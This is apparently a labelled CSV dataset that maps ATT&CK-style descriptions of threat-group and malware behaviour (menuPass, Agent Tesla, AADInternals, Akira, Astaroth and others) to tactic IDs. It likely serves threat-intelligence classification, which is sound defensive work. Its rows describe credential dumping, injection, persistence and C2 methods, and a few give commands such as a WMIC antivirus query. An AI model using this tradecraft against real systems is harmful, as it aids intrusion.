"menuPass has attempted to get victims to open malicious files such as Windows Shortcuts and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.",['TA0002:Execution']
menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files.,['TA0005:Defense Evasion']
menuPass has been seen changing malicious files to appear legitimate.,['TA0005:Defense Evasion']
menuPass has used Ntdsutil to dump credentials.,['TA0006:Credential Access']
"menuPass has used native APIs including GetModuleFileName, lstrcat, CreateFile, and ReadFile.",['TA0002:Execution']
"menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.",['TA0007:Discovery']
menuPass uses PowerSploit to inject shellcode into PowerShell.,['TA0002:Execution']
menuPass has used process hollowing in iexplore.exe to load the RedLeaves implant.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.,['TA0009:Collection']
menuPass has used RDP connections to move across the victim network.,['TA0008:Lateral Movement']
menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command net view /domain to a PlugX implant to gather information about remote systems on the network.,['TA0007:Discovery']
menuPass has renamed certutil and moved it to a different location on the system to avoid detection based on use of the tool.,['TA0005:Defense Evasion']
menuPass has used Putty Secure Copy Client to transfer data.,['TA0008:Lateral Movement']
menuPass has used a script to execute a command on a target machine via Task Scheduler.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.,['TA0006:Credential Access']
menuPass has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.,['TA0001:Initial Access']
menuPass has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.,['TA0007:Discovery']
menuPass has used net use to conduct connectivity checks to machines.,['TA0007:Discovery']
"menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump.",['TA0042:Resource Development']
menuPass has used legitimate access granted to Managed Service Providers in order to access victims of interest.,['TA0001:Initial Access']
menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files.,['TA0002:Execution']
"menuPass has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.",['TA0002:Execution']
3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.,['TA0007:Discovery']
3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&%9&jkMCXuiS. 3PARA RAT will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS if the DES decoding fails,['TA0011:Command and Control']
3PARA RAT has a command to set certain attributes such as creation/modification timestamps on files.,['TA0005:Defense Evasion']
3PARA RAT uses HTTP for command and control.,['TA0011:Command and Control']
4H RAT has the capability to obtain file and directory listings.,['TA0007:Discovery']
4H RAT has the capability to obtain a listing of running processes .,['TA0007:Discovery']
4H RAT obfuscates C2 communication using a 1-byte XOR with the key 0xBE.,['TA0011:Command and Control']
4H RAT sends an OS version identifier in its beacons.,['TA0007:Discovery']
4H RAT uses HTTP for command and control.,['TA0011:Command and Control']
4H RAT has the capability to create a remote shell.,['TA0002:Execution']
AADInternals can enumerate Azure AD users.,['TA0007:Discovery']
AADInternals can create new Azure AD users.,['TA0003:Persistence']
AADInternals can execute commands on Azure virtual machines using the VM agent.,['TA0002:Execution']
AADInternals can enumerate Azure AD groups.,['TA0007:Discovery']
"AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.",['TA0007:Discovery']
"AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.",['TA0006:Credential Access']
AADInternals can collect files from a user’s OneDrive.,['TA0009:Collection']
AADInternals can register a device to Azure AD.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AADInternals can gather information about a tenant’s domains using public Microsoft APIs.,['TA0043:Reconnaissance']
AADInternals can check for the existence of user email addresses using public Microsoft APIs.,['TA0043:Reconnaissance']
AADInternals can directly download cloud user data such as OneDrive files.,['TA0010:Exfiltration']
AADInternals can inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
AADInternals can dump secrets from the Local Security Authority.,['TA0006:Credential Access']
AADInternals can modify registry keys as part of setting a new pass-through authentication agent.,['TA0005:Defense Evasion']
The AADInternals `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
AADInternals is written and executed via PowerShell.,['TA0002:Execution']
AADInternals can gather encryption keys from Azure AD services such as ADSync and Active Directory Federated Services servers.,['TA0006:Credential Access']
AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.,['TA0006:Credential Access']
AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.,['TA0006:Credential Access']
"AADInternals can send ""consent phishing"" emails containing malicious links designed to steal users’ access tokens.",['TA0001:Initial Access']
AADInternals can send phishing emails containing malicious links designed to collect users’ credentials.,['TA0043:Reconnaissance']
AADInternals can steal users’ access tokens via phishing emails containing malicious links.,['TA0006:Credential Access']
"AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.",['TA0006:Credential Access']
AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ABK has the ability to decrypt AES encrypted payloads.,['TA0005:Defense Evasion']
ABK has the ability to download files from C2.,['TA0011:Command and Control']
ABK has the ability to inject shellcode into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ABK has the ability to identify the installed anti-virus product on the compromised host.,['TA0007:Discovery']
ABK can extract a malicious Portable Executable from a photo.,['TA0005:Defense Evasion']
ABK has the ability to use HTTP in communications with C2.,['TA0011:Command and Control']
ABK has the ability to use cmd to run a Portable Executable on the compromised host.,['TA0002:Execution']
ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.,['TA0009:Collection']
ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch algorithm.,['TA0009:Collection']
A variant of ADVSTORESHELL encrypts some C2 with RSA.,['TA0011:Command and Control']
Some variants of ADVSTORESHELL achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ADVSTORESHELL exfiltrates data over the same channel used for C2.,['TA0010:Exfiltration']
ADVSTORESHELL can delete files and directories.,['TA0005:Defense Evasion']
ADVSTORESHELL can list files and directories.,['TA0007:Discovery']
ADVSTORESHELL can perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.,['TA0009:Collection']
ADVSTORESHELL is capable of setting and deleting Registry values.,['TA0005:Defense Evasion']
ADVSTORESHELL is capable of starting a process using CreateProcess.,['TA0002:Execution']
"Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.",['TA0005:Defense Evasion']
ADVSTORESHELL can list connected devices.,['TA0007:Discovery']
ADVSTORESHELL can list running processes.,['TA0007:Discovery']
ADVSTORESHELL can enumerate registry keys.,['TA0007:Discovery']
ADVSTORESHELL achieves persistence by adding itself to the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.,['TA0005:Defense Evasion']
"ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.",['TA0010:Exfiltration']
"C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.",['TA0011:Command and Control']
A variant of ADVSTORESHELL encrypts some C2 with 3DES.,['TA0011:Command and Control']
ADVSTORESHELL can run Systeminfo to gather information about the victim.,['TA0007:Discovery']
ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.,['TA0011:Command and Control']
ADVSTORESHELL can create a remote shell and run a given command.,['TA0002:Execution']
ANDROMEDA can download additional payloads from C2.,['TA0011:Command and Control']
ANDROMEDA has been delivered through a LNK file disguised as a folder.,['TA0005:Defense Evasion']
ANDROMEDA has been installed to `C:\Temp\TrustedInstaller.exe` to mimic a legitimate Windows installer service.,['TA0005:Defense Evasion']
ANDROMEDA can inject into the `wuauclt.exe` process to perform C2 actions.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ANDROMEDA can establish persistence by dropping a sample of itself to `C:\ProgramData\Local Settings\Temp\mskmde.com` and adding a Registry run key to execute every time a user logs on.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ANDROMEDA has been spread via infected USB keys.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
ANDROMEDA has the ability to make GET requests to download files from C2.,['TA0011:Command and Control']
ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services .,['TA0003:Persistence']
AcidRain performs an in-depth wipe of the target filesystem and various attached storage devices through either a data overwrite or calling various IOCTLS to erase it.,['TA0040:Impact']
"AcidRain iterates over device file identifiers on the target, opens the device file, and either overwrites the file or calls various IOCTLS commands to erase it.",['TA0040:Impact']
AcidRain identifies specific files and directories in the Linux operating system associated with storage devices.,['TA0007:Discovery']
AcidRain reboots the target system once the various wiping processes are complete.,['TA0040:Impact']
Action RAT can collect local data from an infected machine.,['TA0009:Collection']
Action RAT can use Base64 to decode actor-controlled C2 server communications.,['TA0005:Defense Evasion']
Action RAT has the ability to collect drive and file information on an infected machine.,['TA0007:Discovery']
Action RAT has the ability to download additional payloads onto an infected machine.,['TA0011:Command and Control']
"Action RAT's commands, strings, and domains can be Base64 encoded within the payload.",['TA0005:Defense Evasion']
Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.,['TA0007:Discovery']
"Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host.",['TA0007:Discovery']
Action RAT has the ability to collect the MAC address of an infected host.,['TA0007:Discovery']
Action RAT has the ability to collect the username from an infected host.,['TA0007:Discovery']
Action RAT can use HTTP to communicate with C2 servers.,['TA0011:Command and Control']
Action RAT can use `cmd.exe` to execute commands on an infected host.,['TA0002:Execution']
Action RAT can use WMI to gather AV products installed on an infected host.,['TA0002:Execution']
AdFind can enumerate domain users.,['TA0007:Discovery']
AdFind can enumerate domain groups.,['TA0007:Discovery']
AdFind can gather information about organizational units and domain trusts from Active Directory.,['TA0007:Discovery']
AdFind has the ability to query Active Directory for computers.,['TA0007:Discovery']
AdFind can extract subnet information from Active Directory.,['TA0007:Discovery']
Agent Tesla can encrypt data with 3DES before sending it over to a C2 server.,['TA0009:Collection']
Agent Tesla has the ability to use form-grabbing to extract data from web data forms.,['TA0009:Collection']
Agent Tesla can steal data from the victim’s clipboard.,['TA0009:Collection']
Agent Tesla has the ability to extract credentials from configuration or support files.,['TA0006:Credential Access']
Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.,['TA0006:Credential Access']
Agent Tesla can gather credentials from a number of browsers.,['TA0006:Credential Access']
Agent Tesla has the ability to extract credentials from the Registry.,['TA0006:Credential Access']
Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.,['TA0005:Defense Evasion']
Agent Tesla has the capability to kill any running analysis processes and AV software.,['TA0005:Defense Evasion']
"Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.",['TA0010:Exfiltration']
Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.,['TA0002:Execution']
Agent Tesla has created hidden folders.,['TA0005:Defense Evasion']
Agent Tesla has used ProcessWindowStyle.Hidden to hide windows.,['TA0005:Defense Evasion']
Agent Tesla can download additional files for execution on the victim’s machine.,['TA0011:Command and Control']
Agent Tesla can log keystrokes on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Agent Tesla can collect account information from the victim’s machine.,['TA0007:Discovery']
Agent Tesla has used SMTP for C2 communications.,['TA0011:Command and Control']
Agent Tesla has been executed through malicious e-mail attachments,['TA0002:Execution']
Agent Tesla can achieve persistence by modifying Registry key entries.,['TA0005:Defense Evasion']
Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult. Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.,['TA0005:Defense Evasion']
Agent Tesla can list the current running processes on the system.,['TA0007:Discovery']
Agent Tesla has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Agent Tesla can inject into known, vulnerable binaries on targeted hosts.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Agent Tesla can add itself to the Registry as a startup program to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.,['TA0005:Defense Evasion']
Agent Tesla has achieved persistence via scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Agent Tesla can capture screenshots of the victim’s desktop.,['TA0009:Collection']
The primary delivered mechanism for Agent Tesla is through email phishing messages.,['TA0001:Initial Access']
"Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.",['TA0007:Discovery']
Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.,['TA0007:Discovery']
Agent Tesla can collect the username from the victim’s machine.,['TA0007:Discovery']
Agent Tesla can collect the timestamp from the victim’s machine.,['TA0007:Discovery']
Agent Tesla can access the victim’s webcam and record video.,['TA0009:Collection']
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Agent Tesla has used HTTP for C2 communications.,['TA0011:Command and Control']
Agent Tesla can collect names and passwords of all Wi-Fi networks to which a device has previously connected.,['TA0007:Discovery']
Agent Tesla has used wmi queries to gather information from the system.,['TA0002:Execution']
Agent.btz saves system information into an XML file that is then XOR-encoded.,['TA0009:Collection']
Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.,['TA0010:Exfiltration']
Agent.btz attempts to download an encrypted binary from a specified domain.,['TA0011:Command and Control']
"Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.","['TA0001:Initial Access', 'TA0008:Lateral Movement']"
"Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.",['TA0007:Discovery']
Agent.btz obtains the victim username and saves it to a file.,['TA0007:Discovery']
Akira encrypts victim filesystems for financial extortion purposes.,['TA0040:Impact']
Akira examines files prior to encryption to determine if they meet requirements for encryption and can be encrypted by the ransomware. These checks are performed through native Windows functions such as GetFileAttributesW.,['TA0007:Discovery']
Akira will delete system volume shadow copies via PowerShell commands.,['TA0040:Impact']
Akira executes native Windows functions such as GetFileAttributesW and `GetSystemInfo`.,['TA0002:Execution']
Akira can identify remote file shares for encryption.,['TA0007:Discovery']
Akira will execute PowerShell commands to delete system volume shadow copies.,['TA0002:Execution']
Akira verifies the deletion of volume shadow copies by checking for the existence of the process ID related to the process created to delete these items.,['TA0007:Discovery']
Akira uses the GetSystemInfo Windows function to determine the number of processors on a victim machine.,['TA0007:Discovery']
Akira executes from the Windows command line and can take various arguments for execution.,['TA0002:Execution']
Akira will leverage COM objects accessed through WMI during execution to evade detection.,['TA0002:Execution']
Amadey can collect information from a compromised host.,['TA0009:Collection']
Amadey has decoded antivirus name strings.,['TA0005:Defense Evasion']
Amadey has sent victim data to its C2 servers.,['TA0010:Exfiltration']
Amadey has used fast flux DNS for its C2.,['TA0011:Command and Control']
Amadey has searched for folders associated with antivirus software.,['TA0007:Discovery']
Amadey can download and execute files to further infect a host machine with additional malware.,['TA0011:Command and Control']
Amadey has modified the `:Zone.Identifier` in the ADS area to zero.,['TA0005:Defense Evasion']
Amadey has overwritten registry keys for persistence.,['TA0005:Defense Evasion']
"Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.",['TA0002:Execution']
"Amadey has obfuscated strings such as antivirus vendor names, domains, files, and others.",['TA0005:Defense Evasion']
Amadey has changed the Startup folder to the one containing its executable by overwriting the registry keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Amadey has checked for a variety of antivirus products.,['TA0007:Discovery']
Amadey has collected the computer name and OS version from a compromised machine.,['TA0007:Discovery']
Amadey does not run any tasks or install additional malware if the victim machine is based in Russia.,['TA0007:Discovery']
Amadey can identify the IP address of a victim machine.,['TA0007:Discovery']
Amadey has collected the user name from a compromised host using `GetUserNameA`.,['TA0007:Discovery']
Amadey has used HTTP for C2 communications.,['TA0011:Command and Control']
Anchor has been signed with valid certificates to evade detection by security tools.,['TA0005:Defense Evasion']
Anchor can install itself as a cron job.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Variants of Anchor can use DNS tunneling to communicate with C2.,['TA0011:Command and Control']
Anchor can terminate itself if specific execution flags are not present.,['TA0005:Defense Evasion']
Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.,['TA0011:Command and Control']
Anchor can self delete its dropper after the malware is successfully deployed.,['TA0005:Defense Evasion']
Anchor can download additional payloads.,['TA0011:Command and Control']
Anchor has used NTFS to hide files.,['TA0005:Defense Evasion']
Anchor has used ICMP in C2 communications.,['TA0011:Command and Control']
Anchor has obfuscated code with stack strings and string encryption.,['TA0005:Defense Evasion']
Anchor can support windows execution via SMB shares.,['TA0008:Lateral Movement']
Anchor can create a scheduled task for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Anchor can create and execute services to load its payload.,['TA0002:Execution']
Anchor has come with a packed payload.,['TA0005:Defense Evasion']
Anchor can determine the hostname and linux version on a compromised host.,['TA0007:Discovery']
Anchor can determine the public IP and location of a compromised host.,['TA0007:Discovery']
Anchor can execute payloads via shell scripting.,['TA0002:Execution']
Anchor has used HTTP and HTTPS in C2 communications.,['TA0011:Command and Control']
Anchor has used cmd.exe to run its self deletion routine.,['TA0002:Execution']
Anchor can establish persistence by creating a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Apostle will attempt to delete all event logs on a victim machine following file wipe activity.,['TA0005:Defense Evasion']
"Apostle initially masqueraded as ransomware but actual functionality is a data destruction tool, supported by an internal name linked to an early version, wiper-action. Apostle writes random data to original files after an encrypted copy is created, along with resizing the original file to zero and changing time property metadata before finally deleting the original file.",['TA0040:Impact']
"Apostle creates new, encrypted versions of files then deletes the originals, with the new filenames consisting of a random GUID and "".lock"" for an extension.",['TA0040:Impact']
Apostle compiled code is obfuscated in an unspecified fashion prior to delivery to victims.,['TA0005:Defense Evasion']
Apostle searches for files on available drives based on a list of extensions hard-coded into the sample for follow-on wipe activity.,['TA0040:Impact']
"Apostle's ransomware variant requires that a base64-encoded argument is passed when executed, that is used as the Public Key for subsequent encryption operations. If Apostle is executed without this argument, it automatically runs a self-delete function.",['TA0005:Defense Evasion']
"Apostle writes batch scripts to disk, such as system.bat and remover.bat, that perform various anti-analysis and anti-forensic tasks, before finally deleting themselves at the end of execution. Apostle attempts to delete itself after encryption or wiping operations are complete and before shutting down the victim machine.",['TA0005:Defense Evasion']
"Apostle retrieves a list of all running processes on a victim host, and stops all services containing the string ""sql,"" likely to propagate ransomware activity to database files.",['TA0007:Discovery']
"Apostle achieves persistence by creating a scheduled task, such as MicrosoftCrashHandlerUAC.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Apostle reboots the victim machine following wiping and related activity.,['TA0040:Impact']
AppleJeus has presented the user with a UAC prompt to elevate privileges while installing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
AppleJeus has used a valid digital signature from Sectigo to appear legitimate.,['TA0005:Defense Evasion']
AppleJeus has decoded files received from a C2.,['TA0005:Defense Evasion']
AppleJeus has exfiltrated collected host information to a C2 server.,['TA0010:Exfiltration']
AppleJeus has deleted the MSI file after installation.,['TA0005:Defense Evasion']
"AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings.",['TA0005:Defense Evasion']
"During AppleJeus's installation process, it uses `postinstall` scripts to extract a hidden plist from the application's `/Resources` folder and execute the `plist` file as a Launch Daemon with elevated permissions.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AppleJeus has placed a plist file within the LaunchDaemons folder and launched it manually.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AppleJeus has loaded a plist file using the launchctl command.,['TA0002:Execution']
AppleJeus has required user execution of a malicious MSI installer.,['TA0002:Execution']
AppleJeus's spearphishing links required user interaction to navigate to the malicious website.,['TA0002:Execution']
AppleJeus has been installed via MSI installer.,['TA0005:Defense Evasion']
AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.,['TA0005:Defense Evasion']
AppleJeus has created a scheduled SYSTEM task that runs when a user logs in.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
AppleJeus has been distributed via spearphishing link.,['TA0001:Initial Access']
AppleJeus has collected the victim host information after infection.,['TA0007:Discovery']
AppleJeus has waited a specified time before downloading a second stage payload.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
AppleJeus has used shell scripts to execute commands after installation and set persistence mechanisms.,['TA0002:Execution']
AppleJeus has sent data to its C2 server via POST requests.,['TA0011:Command and Control']
AppleJeus can install itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AppleSeed can gain system level privilege by passing SeDebugPrivilege to the AdjustTokenPrivilege API.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
AppleSeed has compressed collected data before exfiltration.,['TA0009:Collection']
AppleSeed can zip and encrypt data collected on a target system.,['TA0009:Collection']
"AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.",['TA0009:Collection']
AppleSeed has divided files if the size is 0x1000000 bytes or more.,['TA0010:Exfiltration']
AppleSeed can collect data on a compromised host.,['TA0009:Collection']
AppleSeed can find and collect data from removable media devices.,['TA0009:Collection']
AppleSeed can decode its payload prior to execution.,['TA0005:Defense Evasion']
AppleSeed can exfiltrate files via the C2 channel.,['TA0010:Exfiltration']
AppleSeed has exfiltrated files using web services.,['TA0010:Exfiltration']
AppleSeed can use a second channel for C2 when the primary channel is in upload mode.,['TA0011:Command and Control']
AppleSeed can delete files from a compromised host after they are exfiltrated.,['TA0005:Defense Evasion']
"AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.",['TA0007:Discovery']
AppleSeed has the ability to use JavaScript to execute PowerShell.,['TA0002:Execution']
AppleSeed can use GetKeyState and GetKeyboardState to capture keystrokes on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
AppleSeed can stage files in a central location prior to exfiltration.,['TA0009:Collection']
AppleSeed can achieve execution through users running malicious file attachments distributed via email.,['TA0002:Execution']
AppleSeed can disguise JavaScript files as PDFs.,['TA0005:Defense Evasion']
AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.,['TA0005:Defense Evasion']
AppleSeed has the ability to use multiple dynamically resolved API calls.,['TA0002:Execution']
AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.,['TA0005:Defense Evasion']
AppleSeed has the ability to execute its payload via PowerShell.,['TA0002:Execution']
AppleSeed can enumerate the current process on a compromised host.,['TA0007:Discovery']
AppleSeed has the ability to create the Registry key name EstsoftAutoUpdate at HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AppleSeed can call regsvr32.exe for execution.,['TA0005:Defense Evasion']
AppleSeed can take screenshots on a compromised host by calling a series of APIs.,['TA0009:Collection']
AppleSeed has used UPX packers for its payload DLL.,['TA0005:Defense Evasion']
AppleSeed has been distributed to victims through malicious e-mail attachments.,['TA0001:Initial Access']
AppleSeed can identify the OS version of a targeted system.,['TA0007:Discovery']
AppleSeed can identify the IP of a targeted system.,['TA0007:Discovery']
AppleSeed can pull a timestamp from the victim's machine.,['TA0007:Discovery']
AppleSeed has the ability to communicate with C2 over HTTP.,['TA0011:Command and Control']
Aria-body has the ability to identify the titles of running windows on a compromised host.,['TA0007:Discovery']
Aria-body has used ZIP to compress data gathered on a compromised host.,['TA0009:Collection']
Aria-body has the ability to execute a process using runas.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Aria-body has the ability to collect data from USB devices.,['TA0009:Collection']
Aria-body has the ability to decrypt the loader configuration and payload DLL.,['TA0005:Defense Evasion']
Aria-body has the ability to use a DGA for C2 communications.,['TA0011:Command and Control']
Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Aria-body has used an encrypted configuration file for its loader.,['TA0005:Defense Evasion']
Aria-body has the ability to delete files and directories on compromised hosts.,['TA0005:Defense Evasion']
Aria-body has the ability to gather metadata from a file and to search for file and directory names.,['TA0007:Discovery']
Aria-body has the ability to download additional payloads from C2.,['TA0011:Command and Control']
Aria-body has the ability to launch files using ShellExecute.,['TA0002:Execution']
Aria-body has used TCP in C2 communications.,['TA0011:Command and Control']
Aria-body has the ability to enumerate loaded modules for a process..,['TA0007:Discovery']
Aria-body has the ability to use a reverse SOCKS proxy module.,['TA0011:Command and Control']
Aria-body has established persistence via the Startup folder or Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Aria-body has the ability to capture screenshots on compromised hosts.,['TA0009:Collection']
"Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.",['TA0007:Discovery']
"Aria-body has the ability to identify the location, public IP address, and domain name on a compromised host.",['TA0007:Discovery']
Aria-body has the ability to gather TCP and UDP table status listings.,['TA0007:Discovery']
Aria-body has the ability to identify the username on a compromised host.,['TA0007:Discovery']
Aria-body has the ability to duplicate a token from ntprint.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Aria-body has used HTTP in C2 communications.,['TA0011:Command and Control']
"Arp can be used to display a host's ARP cache, which may include address resolutions for remote systems.",['TA0007:Discovery']
Arp can be used to display ARP configuration information on the host.,['TA0007:Discovery']
Astaroth collects information from the clipboard by using the OpenClipboard and GetClipboardData libraries.,['TA0009:Collection']
Astaroth has obfuscated and randomized parts of the JScript code it is initiating.,['TA0005:Defense Evasion']
Astaroth uses ActiveX objects for file execution and manipulation.,['TA0005:Defense Evasion']
Astaroth uses an external software known as NetPass to recover passwords.,['TA0006:Credential Access']
Astaroth can launch itself via DLL Search Order Hijacking.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.,['TA0011:Command and Control']
Astaroth uses a fromCharCode deobfuscation method to avoid explicitly writing execution commands and to hide its code.,['TA0005:Defense Evasion']
Astaroth has used a DGA in C2 communications.,['TA0011:Command and Control']
Astaroth has used an XOR-based algorithm to encrypt payloads twice with different keys.,['TA0005:Defense Evasion']
Astaroth exfiltrates collected information from its r1.log file to the external C2 server.,['TA0010:Exfiltration']
"Astaroth loads its module with the XSL script parameter vShow set to zero, which opens the application with a hidden window.",['TA0005:Defense Evasion']
Astaroth uses certutil and BITSAdmin to download additional malware.,['TA0011:Command and Control']
Astaroth uses JavaScript to perform its core functionalities.,['TA0002:Execution']
Astaroth logs keystrokes from the victim's machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Astaroth collects data in a plaintext file named r1.log before exfiltration.,['TA0009:Collection']
"Astaroth has used malicious files including VBS, LNK, and HTML for execution.",['TA0002:Execution']
Astaroth can abuse alternate data streams to store content for malicious payloads.,['TA0005:Defense Evasion']
Astaroth searches for different processes on the system.,['TA0007:Discovery']
Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Astaroth creates a startup item for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Astaroth can be loaded through regsvr32.exe.,['TA0005:Defense Evasion']
Astaroth checks for the presence of Avast antivirus in the C:\Program\Files\ folder.,['TA0007:Discovery']
Astaroth uses the LoadLibraryExW function to load additional modules.,['TA0002:Execution']
Astaroth's initial payload is a malicious .LNK file.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Astaroth uses a software packer called Pe123\RPolyCryptor.,['TA0005:Defense Evasion']
Astaroth has been delivered via malicious e-mail attachments.,['TA0001:Initial Access']
Astaroth encodes data using Base64 before sending it to the C2 server.,['TA0011:Command and Control']
Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Astaroth collects the machine name and keyboard language from the system.,['TA0007:Discovery']
Astaroth collects the external IP address from the system.,['TA0007:Discovery']
Astaroth collects the timestamp from the infected machine.,['TA0007:Discovery']
